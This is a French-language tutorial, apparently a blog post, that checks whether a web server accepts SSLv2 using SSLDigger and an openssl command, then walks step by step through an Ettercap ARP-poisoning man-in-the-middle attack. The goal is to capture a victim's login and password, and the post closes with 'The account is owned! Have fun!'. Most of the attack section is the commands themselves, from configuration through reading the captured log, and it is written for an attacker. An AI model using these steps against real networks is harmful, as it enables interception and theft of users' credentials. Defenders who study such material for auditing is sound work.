- CAS 1 : Des serveurs WEB reposant sur un certificat SSLv2 vulnérable à des attaques de type Man-in-the-Middle ;
- CAS 2 : Des serveurs WEB reposant sur un certificat SSLv3/TLSv1 mais supportant aussi le protocole SSLv2. Ils deviennent alors eux aussi vulnérables au mêmes type d'attaque ;
- CAS 3 : Des serveurs WEB reposant sur un certificat SSLv3/TLSv1 et ne supportant que ce protocole. Ces serveurs ne sont pas vulnérables sauf si la clé de chiffrement est faible.
2 - Le serveur audité est-il vulnérable ?
Pour effectuer nos tests, nous allons étudier l'outil SSLDigger de Foundstone [télécharger].
Le certificat par défaut peut utiliser un algorithme de chiffrement robuste mais cela n'empêche pas qu'il peut supporter des algorithmes de chiffrements plus faibles.
Après avoir lancé l'outil et entré l'adresse du site, appuyez sur le bouton "GO". De suite, nous voyons que le certificat repose sur un algorithme RSA et une clé de chiffrement de 1024 bits : c'est bon ! De plus, nous remarquons qu'il est signé par une entité reconnue.
Nous allons néanmoins de suite utiliser cette commande pour voir si le site audité supporte le protocole SSLv2 :
openssl s_client -ssl2 -connect www.cible.com:443
Bingo ! Nous nous connectons au serveur en SSLv2. (NB: avec le protocole DES-CBC3-MD5, l'un des protocoles repérés par SSLDigger).
Alors nous pouvons passer à la suite !
3 - Lancement d'une attaque de type Man-in-the-Middle
3.1 - Préparation
Pour mener l'attaque, nous aurons besoin d'un seul outil, Ettercap [télécharger].
Configuration (si vous utilisez ipchains/iptables) :
- Ouvrir etter.conf ;
- Décommenter les lignes :
- redir_command_on
- redir_command_off
- 1 serveur qui correspond à nos critères de la phase 2 ;
- 1 machine victime qui se connecte vers se serveur après authentification ;
- 1 machine pirate qui se placera entre les deux machines pour mener une attaque de type MiTM.
On commence par vérifier que toutes les machines sont localisées (en ligne de commande "T", sur l'interface eth0 "i") :
ettercap -Tqi eth0 // //
On devrait voir l'adresse de la victime et celle du routeur commun (cadre rouge) alors que l'adresse du pirate apparaît en haut (cadre vert) :
L'attaque se lance avec la commande suivante :
ettercap -Tqi eth0 -M arp -l mission /adresse-routeur/ /adresse-victim/
Vous capturerez le compte dès que la victime se connectera sur le site avec son couple login/mot de passe.
Par la suite, nous pouvons retrouver les résultats en lisant le fichier de capture :
etterlog mission.eci
The account is owned! Have fun! :)

